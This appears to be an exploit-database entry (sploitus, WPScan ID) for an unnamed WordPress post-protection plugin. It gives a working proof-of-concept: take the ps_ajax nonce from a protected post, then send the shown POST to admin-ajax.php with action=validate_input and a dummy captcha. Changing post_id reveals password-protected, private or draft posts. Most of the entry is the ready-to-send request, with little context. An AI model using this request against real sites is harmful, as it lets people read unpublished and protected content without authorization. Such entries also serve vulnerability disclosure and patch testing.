Share
## https://sploitus.com/exploit?id=WPEX-ID:0967303D-EA49-4993-84EB-A7EC97240071
The nonce can be retrieved from a post protected by the plugin (look for ps_ajax). 1260 is the ID of a post protected by the plugin and a password. Arbitrary posts (such as private/draft) can also be accessed the same way, just by changing the post_id parameter)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

action=validate_input&nonce=a14db14dbd&captcha=a&post_id=1260&type=captcha&protection=full